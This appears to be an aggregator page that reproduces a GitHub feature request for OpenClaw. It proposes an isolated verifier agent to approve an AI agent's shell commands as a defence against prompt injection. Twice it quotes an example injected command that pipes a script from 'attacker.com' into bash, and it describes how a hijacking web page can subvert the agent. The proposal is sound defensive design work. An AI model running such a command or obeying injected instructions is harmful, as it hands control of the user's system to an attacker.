openclaw - 💡(How to fix) Fix [Feature]: Agent-as-Approver for Exec Approvals

Official PRs (…)
ON THIS PAGE

Recommended Tools

×6

Utilities matched from this issue’s tags and category — try them while you read without losing context.

GitHub issue graph ai analysis

Paste a GitHub issue URL. We fetch that issue, discover linked issues from bodies/comments/timeline, collect linked pull requests, and produce a structured English report.

The report is written in English Markdown for sharing and archival.

Helpful · Quick feedback

Loading…

Allow an independent AI agent to serve as an automated exec approval verifier, providing a middle ground between human-in-the-loop and no approvals (YOLO).

Root Cause

Real-world scenario from our setup: A cron job fetches web content and the agent processes it. If a page contains prompt injection that tricks the agent into running python3 -c "import os; os.system('curl attacker.com/steal.sh | bash')", the current allowlist passes it because python3 is allowlisted. A human might catch it — but only if they're reading carefully and understand the command. An agent verifier seeing just the raw command (without the injected context) would flag the suspicious curl | bash pattern.

Code Example

{
  approvals: {
    exec: {
      enabled: true,
      mode: "agent",  // new mode alongside "session" and "targets"
      agent: {
        agentId: "exec-verifier",  // or external endpoint
        policy: "default",         // or path to custom policy
        context: "command-only",   // never send conversation history
        fallback: "deny",         // if verifier unavailable: "deny", "ask-human", or "allow"
        timeoutMs: 10000,
        notifyOnDeny: true,       // optionally alert human on denials
        notifyChannel: "telegram"
      }
    }
  }
}
RAW_BUFFERClick to expand / collapse

Summary

Allow an independent AI agent to serve as an automated exec approval verifier, providing a middle ground between human-in-the-loop and no approvals (YOLO).

Problem to solve

The current exec approval system is binary: either a human reviews every command, or approvals are off entirely. This creates problems:

  • Approval fatigue: Non-technical users don't understand most commands and end up rubber-stamping everything, defeating the security purpose
  • Workflow disruption: Even for technical users, frequent approval prompts for routine commands interrupt flow
  • No unattended protection: Cron jobs and background tasks that execute unattended have no approval layer — toolsAllow restricts which tools are available but can't evaluate how allowed tools are being used (e.g., curl used for exfiltration vs. a local health check)

Meanwhile, prompt injection is a real threat: a malicious web page fetched by a cron job or browsing session can trick the agent into executing arbitrary commands using already-allowlisted tools.

Proposed solution

Add an agent-as-approver mode in the exec approval flow. When the primary agent requests a command, instead of prompting the human, OpenClaw sends the raw command only (no conversation context, no reasoning) to a designated verifier agent that evaluates it against a safety policy.

Key design principles:

  1. Context isolation is the security model. The verifier never sees the web page, conversation history, or reasoning that led to the command. A prompt injection that corrupted the primary agent's context doesn't reach the verifier.

  2. The verifier is narrow and rules-based. Rather than open-ended "is this safe?", it checks explicit rules: Does this pipe to bash/eval? Does it access the network? Does it modify files outside the workspace? Does it match known-safe patterns?

  3. Different model recommended. Using a different model eliminates shared model vulnerabilities, though context isolation provides the primary protection.

Configuration concept:

{
  approvals: {
    exec: {
      enabled: true,
      mode: "agent",  // new mode alongside "session" and "targets"
      agent: {
        agentId: "exec-verifier",  // or external endpoint
        policy: "default",         // or path to custom policy
        context: "command-only",   // never send conversation history
        fallback: "deny",         // if verifier unavailable: "deny", "ask-human", or "allow"
        timeoutMs: 10000,
        notifyOnDeny: true,       // optionally alert human on denials
        notifyChannel: "telegram"
      }
    }
  }
}

Flow: Primary agent requests exec → OpenClaw sends raw command to verifier → Verifier approves/denies based on policy → If denied, optionally notify human.

Alternatives considered

  1. Human-only approvals (current): Works for technical users but creates approval fatigue for non-technical operators who rubber-stamp everything
  2. Strict allowlist only: Prevents unknown commands but doesn't catch misuse of allowed commands (e.g., curl used for data exfiltration instead of a local service check)
  3. Model self-policing via system prompt: Single point of failure — if the model is prompt-injected, the safety instructions are ignored along with everything else

Impact

  • Affected users: Non-technical operators, multi-agent setups handling untrusted web content, anyone running unattended cron jobs with exec access
  • Severity: Medium-high — approval fatigue means the security layer exists on paper but provides no real protection when users rubber-stamp
  • Frequency: Every exec approval prompt (multiple times per session for active users)
  • Consequence: Either users disable approvals entirely (no protection) or rubber-stamp them (false sense of security). No middle ground exists today.

Evidence/examples

Real-world scenario from our setup: A cron job fetches web content and the agent processes it. If a page contains prompt injection that tricks the agent into running python3 -c "import os; os.system('curl attacker.com/steal.sh | bash')", the current allowlist passes it because python3 is allowlisted. A human might catch it — but only if they're reading carefully and understand the command. An agent verifier seeing just the raw command (without the injected context) would flag the suspicious curl | bash pattern.

Additional information

Limitations (honest assessment):

  • Not a silver bullet — sophisticated attacks crafting legitimate-looking commands can fool both agents
  • Same-model weakness if both agents share weights (mitigated by context isolation)
  • Adds one API call of latency per exec request
  • New failure mode if verifier service is down (mitigated by configurable fallback)

Complementary to existing features: This works alongside toolsAllow (restricts available tools), strictInlineEval (blocks inline code eval), and allowlist mode (restricts allowed binaries). The agent verifier adds semantic evaluation that static rules can't provide.

Vote matrix · Quick signals

Works
Did the solution work? Tap to confirm.
Easy Fix
Was it a quick fix?
Time Saver
Did it save you time?
Blocking
Was it severely blocking?
Common Issue
Are others likely hitting this too?
Flaky / Intermittent
Is it intermittent?
Verified / Reproducible
Can you reproduce it reliably?
Loading…

Still need to ship something?

×6

Another batch ranked right after the header list — different links, same matching logic.

Back to top recommendations

TRENDING

openclaw - 💡(How to fix) Fix [Feature]: Agent-as-Approver for Exec Approvals